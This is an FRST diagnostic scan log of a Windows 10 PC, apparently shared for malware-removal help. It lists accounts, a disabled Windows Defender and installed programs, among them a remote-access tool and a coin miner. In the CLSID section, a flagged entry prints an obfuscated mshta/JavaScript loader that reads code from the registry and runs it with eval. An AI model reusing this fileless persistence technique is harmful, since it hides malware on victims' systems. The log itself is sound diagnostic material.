Untitled

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-07-2017
Ran by Alex-PC (30-07-2017 09:21:04)
Running from C:\Users\Alex-PC\Desktop
Windows 10 Enterprise Version 1607 (X64) (2016-10-15 20:13:58)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Admin (S-1-5-21-301418830-272668332-706810675-1005 - Administrator - Enabled) => C:\Users\Admin
Administrator (S-1-5-21-301418830-272668332-706810675-500 - Administrator - Disabled)
Alex-PC (S-1-5-21-301418830-272668332-706810675-1001 - Administrator - Enabled) => C:\Users\Alex-PC
DefaultAccount (S-1-5-21-301418830-272668332-706810675-503 - Limited - Disabled)
Guest (S-1-5-21-301418830-272668332-706810675-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-301418830-272668332-706810675-1004 - Limited - Enabled)
user (S-1-5-21-301418830-272668332-706810675-1007 - Administrator - Enabled) => C:\Users\user

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

.NET Reflector Desktop (HKLM-x32\...\{067796E0-7973-4882-BB41-FE94453D4CAA}) (Version: 8.2.0.7 - Red Gate Software Ltd)
ABBYY FineReader 14 (HKLM\...\{F14000FE-0001-6400-0000-074957833700}) (Version: 14.1.591 - ABBYY Production LLC)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20058 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Ancient Weapon Sounds (HKLM-x32\...\{E00A5837-482C-4DCE-B4CC-D16B343374E1}) (Version: 2.1.1 - Screaming Bee)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 375.70 - NVIDIA Corporation) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{F2871C89-C8A5-42EE-8D45-0F02506385A6}) (Version: 5.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{9BC93467-75D1-4AA4-BD58-D9C51D88DFAB}) (Version: 5.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
AutoHotkey 1.1.24.05 (HKLM\...\AutoHotkey) (Version: 1.1.24.05 - Lexikos)
Batch Converter Plug-In (HKLM-x32\...\{11BEA44C-BCFE-405E-9C76-33EF407A4354}) (Version: 4.0.4 - Screaming Bee)
Battlefield™ 1 (HKLM-x32\...\{335B50BC-6130-4BAF-9A6A-F1561270587B}) (Version: 1.0.10.265 - Electronic Arts)
Bethesda.net Launcher (HKLM-x32\...\{3448917E-E4FE-4E30-9502-9FD52EABB6F5}_is1) (Version: 1.17.1 - Bethesda Softworks)
BitTorrent (HKU\S-1-5-21-301418830-272668332-706810675-1001\...\BitTorrent) (Version: 7.10.0.43917 - BitTorrent Inc.)
Blackwake (HKLM\...\Steam App 420290) (Version:  - Mastfire Studios Pty Ltd)
Blue Satin Skin (HKLM-x32\...\{FB7D6550-9260-42E6-83C8-BF3A7E54442F}) (Version: 2.2.1 - Screaming Bee)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.6.104.6367 - BlueStack Systems, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Build Tools - amd64 (HKLM\...\{F74753A3-C93C-34F5-A199-993CAF602B7D}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools - x86 (HKLM-x32\...\{FB3A15FD-FC67-3A2F-892B-6890B0C56EA9}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools Language Resources - amd64 (HKLM\...\{05198C22-FFCE-374A-B190-9F18CC99DAEA}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools Language Resources - x86 (HKLM-x32\...\{9347889B-C22A-3905-901F-C05D8F73C929}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
C and C 3 Kane Wrath (HKLM-x32\...\{A445346A-4B52-2B42-48D3-6FDF3A865451}_is1) (Version: 1.02 - EA (Coop-Land))
Canon MF3010 (HKLM\...\{A97F4E18-3053-4652-B763-9A40AE2B1EE5}) (Version: 3.9.0.1 - CANON INC.)
CCleaner (HKLM\...\CCleaner) (Version: 5.28 - Piriform)
Cheat Engine 6.6 (HKLM-x32\...\Cheat Engine 6.6_is1) (Version:  - Cheat Engine)
Clownfish Voice Changer (HKLM\...\ClownfishVoiceChanger) (Version:  - )
Comic Sound Pack (HKLM-x32\...\{91C78DA1-800F-4ACE-B6F6-206F7617D69E}) (Version: 2.1.1 - Screaming Bee)
Command and Conquer 3 - Tiberium Wars (HKLM-x32\...\{DDEDAF6C-488E-4CDA-8276-1CCF5F3C5C32}_is1) (Version: 1.09 - -=Hooli G@n=-)
Company of Heroes - FAKEMSI (HKLM-x32\...\{14574B7F-75D1-4718-B7F2-EBF6E2862A35}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{199E6632-EB28-4F73-AECB-3E192EB92D18}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{25724802-CC14-4B90-9F3B-3D6955EE27B1}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{32C4A4EB-C97D-414E-99C5-38F8DFD31D5D}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{50193078-F553-4EBA-AA77-64C9FAA12F98}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{51D718D1-DA81-4FAD-919F-5C1CE3C33379}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{66F78C51-D108-4F0C-A93C-1CBE74CE338F}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{7F4B1592-222F-4E5F-A100-E5AFD61A0BB3}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{80D03817-7943-4839-8E96-B9F924C5E67D}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{97E5205F-EA4F-438F-B211-F1846419F1C1}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{99A7722D-9ACB-43F3-A222-ABC7133F159E}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{BA801B94-C28D-46EE-B806-E1E021A3D519}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{D4D244D1-05E0-4D24-86A2-B2433C435671}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes - FAKEMSI (HKLM-x32\...\{EAF636A9-F664-4703-A659-85A894DA264F}) (Version: 2.0.0.0 - THQ Inc.) Hidden
Company of Heroes (HKLM-x32\...\Company of Heroes) (Version: 2.602.0 - THQ Inc.)
Company of Heroes 2 Update v3.0.0.9704 incl DLC (HKLM-x32\...\Q29tcGFueW9mSGVyb2VzMg==_is1) (Version: 1 - )
Company of Heroes 2 version 3.0.0.9704 (HKLM-x32\...\Company of Heroes 2_Rick Deckard_is1) (Version: 3.0.0.9704 - Rick Deckard)
Company Of Heroes 2.Digital Collector's Edition.v 3.0.0.9704 + 26 DLC (HKLM-x32\...\Company Of Heroes 2.Digital Collector's Edition.~D0C60FD8_is1) (Version: Company Of Heroes 2.Digital Collector's Edition.v 3.0.0.9704 + 26 DLC - Repack by Fenixx (29.06.2013))
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version:  - Valve)
Creatures of Darkness (HKLM-x32\...\{573F9269-A022-4C6F-97BD-CF1316A76369}) (Version: 3.3.1 - Screaming Bee)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.5.0.0222 - Disc Soft Ltd)
Deep Space Voices (HKLM-x32\...\{67CEC218-B250-4B4C-B23F-A597EC8DB153}) (Version: 3.3.1 - Screaming Bee)
DJ Streaming Plug-In (HKLM-x32\...\{956F54F5-0AA4-441D-8933-7B45F4F56F74}) (Version: 4.3.0 - Screaming Bee)
FACEIT Client version 1.0 (HKLM\...\{1419E44C-0EF4-4822-9194-9F1A4D43973D}_is1) (Version: 1.0 - FACEIT LTD)
Fantasy Sound Pack (HKLM-x32\...\{B53415F5-4060-48DA-ABB8-00F768158F47}) (Version: 1.1.1 - Screaming Bee)
Fantasy Voice Pack (HKLM-x32\...\{5F4C3E1F-87FC-41BD-B219-E4156BBD8AE5}) (Version: 1.3.2 - Screaming Bee)
Farm Animal Sounds (HKLM-x32\...\{F290F841-044D-44EF-9E51-FFFEA7FEE2D7}) (Version: 1.1.1 - Screaming Bee)
Female Voice Pack (HKLM-x32\...\{D947A225-8C23-4E52-866E-CF3967476BFC}) (Version: 3.3.2 - Screaming Bee)
Finding Bigfoot (HKLM-x32\...\{FINDINGBIGFOOT-6B52-2B42-48D3-6FDF3A861253}_is1) (Version: Build 12022017 - CyberLightGameStudios (Coop-Land))
Forged Alliance Forever (HKLM-x32\...\{80FAF23B-3F6F-4922-A20C-0970BA6E110F}) (Version: 0.13.0 - FA Forever Community)
Friday the 13th The Game [Steam] (HKLM-x32\...\{FRIDAYTHE13THTHEGAME-6B52-2B42-48D3-6FDF3A861253}_is1) (Version: Any - )
Furry Voices for Second Life (HKLM-x32\...\{2032DA39-C844-43AE-B638-6A4F7496686E}) (Version: 1.3.1 - Screaming Bee)
Galactic Voices (HKLM-x32\...\{891D8FC9-726D-46F2-ADC0-E060A6EB1DC3}) (Version: 1.3.1 - Screaming Bee)
GameRanger (HKU\S-1-5-21-301418830-272668332-706810675-1001\...\GameRanger) (Version:  - GameRanger Technologies)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version:  - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Gwent (HKLM-x32\...\1971477531_is1) (Version: 0.9.7 public beta - GOG.com)
IconChanger (HKLM-x32\...\{C912EFA0-0076-11d5-B04A-BD6C80DF2479}) (Version:  - )
Imminent Monitor (HKLM-x32\...\Imminent Monitor) (Version: 5.0 - Imminent Methods)
iTunes (HKLM\...\{F11677B7-0D8E-4F34-BEBB-6869FE861CDF}) (Version: 12.5.2.36 - Apple Inc.)
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Killer Bandwidth Control Filter Driver (HKLM\...\{45B07659-B355-492D-8177-12AD31E7E3E6}) (Version: 1.1.56.1651 - Rivet Networks) Hidden
Killer E220x Drivers (HKLM\...\{419E1AB9-3E42-42C5-B00E-E5E09DBEAA19}) (Version: 1.1.56.1651 - Rivet Networks) Hidden
Killer Network Manager (HKLM\...\{9E99C063-B796-4595-BA4D-F957F6CE5E83}) (Version: 1.1.56.1651 - Rivet Networks) Hidden
Killer Performance Suite (HKLM-x32\...\{DB8A465E-67BE-4450-9C9A-FECEA6222B95}) (Version: 1.1.56.1651 - Rivet Networks)
League of Legends (HKLM-x32\...\{137A4B6C-E8D0-4CF9-98AF-8DCDA31D0416}) (Version: 4.1.2 - Riot Games) Hidden
League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games)
Lightshot-5.4.0.10 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.10 - Skillbrains)
Livestreamer 1.12.2 (HKLM-x32\...\Livestreamer) (Version:  - )
LogMeIn Hamachi (HKLM-x32\...\{BE82D2D7-6CA2-43B3-8C22-CCF6405806E7}) (Version: 2.2.0.579 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.579 - LogMeIn, Inc.)
Male Voice Pack (HKLM-x32\...\{2CC32E0E-9A10-4BCC-94F0-614F85375F59}) (Version: 1.3.1 - Screaming Bee)
Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Men of War Assault Squad 2 [v.3.260.0] (HKLM-x32\...\{MOWAS2-6B52-2B42-48D3-6FDF3A861253}_is1) (Version: 3.260.0 - 1C Company (Coop-Land))
Microsoft Build Tools 2013 (HKLM-x32\...\{2bceccd3-6613-4596-b748-441a06847696}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-301418830-272668332-706810675-1001\...\OneDriveSetup.exe) (Version: 17.3.6943.0625 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
MinerGate (HKLM-x32\...\MinerGate) (Version: 6.5 - Minergate Inc)
Modern War Sounds (HKLM-x32\...\{A514E94F-C436-44C3-A1E9-1F58CD352669}) (Version: 1.0.1 - Screaming Bee)
MorphVOX Effects Rack (HKLM-x32\...\{4439ED25-D9ED-4E78-A41E-6C6C5DCEDE62}) (Version: 4.3.0 - Screaming Bee)
MorphVOX Pro (HKLM-x32\...\{5F075DA5-407B-4F4D-BF2A-922CCA85706A}) (Version: 4.4.17.22603 - Screaming Bee)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
NetLimiter 4 (HKLM\...\{031BF857-9D3C-4DEE-97F2-69698EE82B06}) (Version: 4.0.25.0 - Locktime Software) Hidden
NetLimiter 4 (HKLM-x32\...\NetLimiter 4 4.0.25.0) (Version: 4.0.25.0 - Locktime Software)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.4.2 - Notepad++ Team)
Note-UP (HKLM-x32\...\NUIns) (Version:  - ) <==== ATTENTION
Novicorp WinToFlash Lite version 1.4.0000 (HKLM-x32\...\{A1A1FF24-34C6-4B77-BDB7-A689979F018C}_is1) (Version: 1.4.0000 - Novicorp)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.5.0.76 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.5.0.76 - NVIDIA Corporation)
NVIDIA Graphics Driver 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.5.0.76 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.4.5.0 - NVIDIA Corporation) Hidden
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 0.16.6 - OBS Project)
Oracle VM VirtualBox 5.1.22 (HKLM\...\{8D5E4D4D-5E0C-4448-B018-5DDEF1E208D9}) (Version: 5.1.22 - Oracle Corporation)
Origin (HKLM-x32\...\Origin) (Version: 10.2.2.60207 - Electronic Arts, Inc.)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM-x32\...\{90150000-001F-040C-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PAYDAY: The Heist (HKLM\...\Steam App 24240) (Version:  - OVERKILL Software)
Personality Voices (HKLM-x32\...\{4B886E97-AF5B-46F0-9F48-6BE03149D972}) (Version: 1.0.1 - Screaming Bee)
Pidgin (HKLM-x32\...\Pidgin) (Version: 2.11.0 - )
pidgin-otr 4.0.2 (HKLM-x32\...\pidgin-otr) (Version: 4.0.2 - Cypherpunks CA)
PLAYERUNKNOWN'S BATTLEGROUNDS (HKLM\...\Steam App 578080) (Version:  - Bluehole, Inc.)
Prey v.1.0 (HKLM-x32\...\Prey_is1) (Version:  - )
Python 3.6.1 (32-bit) (HKU\S-1-5-21-301418830-272668332-706810675-1001\...\{1babc3bc-6a32-44f7-bf4d-60eec36c9ad1}) (Version: 3.6.1150.0 - Python Software Foundation)
Python 3.6.1 Core Interpreter (32-bit) (HKLM-x32\...\{E63E60CA-437B-4894-8395-81F2F66483B0}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python 3.6.1 Development Libraries (32-bit) (HKLM-x32\...\{3029D656-0C32-4AC9-84FB-A15056F356CC}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python 3.6.1 Documentation (32-bit) (HKLM-x32\...\{D1198C40-C6F5-4FFB-B98C-79BF1FE706C1}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python 3.6.1 Executables (32-bit) (HKLM-x32\...\{A7036382-80F1-4FC1-B244-D31AA50337F4}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python 3.6.1 pip Bootstrap (32-bit) (HKLM-x32\...\{899F7F28-F6D3-4E5B-8FBE-F7929036172A}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python 3.6.1 Standard Library (32-bit) (HKLM-x32\...\{3BCCB89B-CD98-4F78-8436-78847FABFD68}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python 3.6.1 Tcl/Tk Support (32-bit) (HKLM-x32\...\{F6ED0771-FE83-4A1C-BE65-A06CB65B46D5}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python 3.6.1 Test Suite (32-bit) (HKLM-x32\...\{F44EF183-905E-48BB-998E-53FC99B36FE3}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python 3.6.1 Utility Scripts (32-bit) (HKLM-x32\...\{2AA7DAB3-6778-42A7-9F33-22615234540E}) (Version: 3.6.1150.0 - Python Software Foundation) Hidden
Python Launcher (HKLM-x32\...\{323AC113-C6CE-4F99-842F-4936332D055A}) (Version: 3.6.5923.0 - Python Software Foundation)
Quake Champions (HKLM-x32\...\Quake Champions) (Version:  - Bethesda Softworks)
Rust (HKLM\...\Steam App 252490) (Version:  - Facepunch Studios)
SaferVPN 3.8.6 (HKLM-x32\...\OpenVPN) (Version: 3.8.6 - )
Sandboxie 5.14 (64-bit) (HKLM\...\Sandboxie) (Version: 5.14 - Sandboxie Holdings, LLC)
Sci-Fi 2 Sound Pack (HKLM-x32\...\{62DC2D57-7AB8-4181-994B-C62D55FCE6F4}) (Version: 1.3.1 - Screaming Bee)
Sci-Fi Sound Pack (HKLM-x32\...\{D16C611D-CA6F-402B-9EDA-9862CF4A701B}) (Version: 1.1.1 - Screaming Bee)
Sci-Fi Voice Pack (HKLM-x32\...\{BC038C91-D3C6-4E43-8439-B65976FE7937}) (Version: 1.3.1 - Screaming Bee)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0360 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.5.0.76 - NVIDIA Corporation) Hidden
Sid Meier's Civilization 5 (HKLM-x32\...\Sid Meier's Civilization 5_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
Sid Meiers Civilization V (HKLM-x32\...\{SIDMEIERSCIVILIZATIONV-6B52-2B42-48D3-6FDF3A861253}_is1) (Version: 1.0.3.279 - 2K Games (Coop-Land))
Sid Meiers Civilization VI (HKLM-x32\...\Sid Meiers Civilization VI_is1) (Version:  - )
Sid Meiers Civilization VI [Steam] (HKLM-x32\...\{SIDMEIERSCIVILIZATIONVI-6B52-2B42-48D3-6FDF3A861253}_is1) (Version: Any - )
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.)
Space Engineers (HKLM\...\Steam App 244850) (Version:  - Keen Software House)
Special Effects Voices (HKLM-x32\...\{913C4C4F-9E3E-41A6-A614-1BDC1352A225}) (Version: 1.0.2 - Screaming Bee)
Spooky Sounds (HKLM-x32\...\{F71EBF86-9A73-44C0-A674-55FA3E4A8428}) (Version: 2.1.1 - Screaming Bee)
Steel Division Normandy 44 (HKLM-x32\...\Steel Division Normandy 44_is1) (Version:  - )
SteelSeries Engine 3.9.12 (HKLM\...\SteelSeries Engine 3) (Version: 3.9.12 - SteelSeries ApS)
Stronghold 2 Deluxe (HKLM-x32\...\{16D2C649-CBA8-44EE-B730-12584667D487}) (Version: 1.40.000 - Firefly Studios)
Stronghold Crusader 2 (HKLM-x32\...\{A412621A-6B52-2B42-48D3-6FDF3A860452}_is1) (Version: 1.0 TMATD DLC - FireFly Studios (Coop-Land))
Sublime Text Build 3126 (HKLM\...\Sublime Text 3_is1) (Version:  - Sublime HQ Pty Ltd)
Supreme Commander: Forged Alliance (HKLM\...\Steam App 9420) (Version:  - Gas Powered Games)
TAP-Windows 9.21.1 (HKLM\...\TAP-Windows) (Version: 9.21.1 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.78716 - TeamViewer)
Text-To-VoIP Plug-in (HKLM-x32\...\{C1A6E1A4-B337-41B5-B580-30EB1FF76D56}) (Version: 4.0.0 - Screaming Bee)
The Forest (HKLM\...\Steam App 242760) (Version:  - Endnight Games Ltd)
Tom Clancy's Rainbow Six Siege (HKLM\...\Steam App 359550) (Version:  - Ubisoft Montreal)
Translator Fun Voice Pack (HKLM-x32\...\{C39768C1-82E7-4466-8526-2D8AC44B768F}) (Version: 1.5.1 - Screaming Bee)
TunnelBear (HKLM-x32\...\{cccb8171-b60b-4da8-8a0a-00e21ff41860}) (Version: 3.0.36.9 - TunnelBear)
TunnelBear (HKLM-x32\...\{DDEA404F-1524-4CA1-B740-A3A0AD6DAFB0}) (Version: 3.0.36.9 - TunnelBear) Hidden
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.8 - Tunngle.net GmbH)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Uplay (HKLM-x32\...\Uplay) (Version: 22.1 - Ubisoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{B5D82DF0-AC2F-469F-8E97-599653947166}) (Version: 12.5.5 - VMware, Inc.)
Voice Splicer Plug-In (HKLM-x32\...\{5A53F620-6A7A-4362-94AD-12D9FCB856E1}) (Version: 4.2.11 - Screaming Bee)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
WinDjView 2.1 (HKLM\...\WinDjView) (Version: 2.1 - Andrew Zhezherun)
Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation)
Windows 7 USB/DVD Download Tool (HKLM-x32\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
WinRAR 5.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH)
World of Warships (HKU\S-1-5-21-301418830-272668332-706810675-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C814ru}_is1) (Version:  - Wargaming.net)
Zoiper (HKLM-x32\...\Zoiper) (Version: 3.9 - Securax LTD)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-301418830-272668332-706810675-1001_Classes\CLSID\{CDD58CBF-DB53-F3F7-8549-0BD91F34917D}\InprocServer32 -> C:\Windows\system32\ole32.dll (Microsoft Corporation)
HKU\.DEFAULT\Software\Classes\2286852b: "C:\WINDOWS\system32\mshta.exe" "javascript:y7aUYP="ET67";re9=new ActiveXObject("WScript.Shell");dG5Jjsn="vuZO5XAR";J9Mad=re9.RegRead("HKCU\\software\\sqhk\\hylsaao");JT4GD="TfKqfzM";eval(J9Mad);iFhq35NKj="Np0K5n";" <==== ATTENTION
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2017-06-19] ()
ContextMenuHandlers1-x32: [ChangeIcon] -> {C912EFA0-0076-11d5-B04A-BD6C80DF2479} => C:\Program Files (x86)\IconChanger\IconChng.dll -> No File
ContextMenuHandlers1-x32: [FineReader14ContextMenu] -> {FB074836-8286-4089-84DC-F504E9EF621C} => C:\Program Files (x86)\ABBYY FineReader 14\x64\FRIntegration.x64.dll [2017-02-28] (ABBYY Production LLC.)
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2014-12-02] (Alexander Roshal)
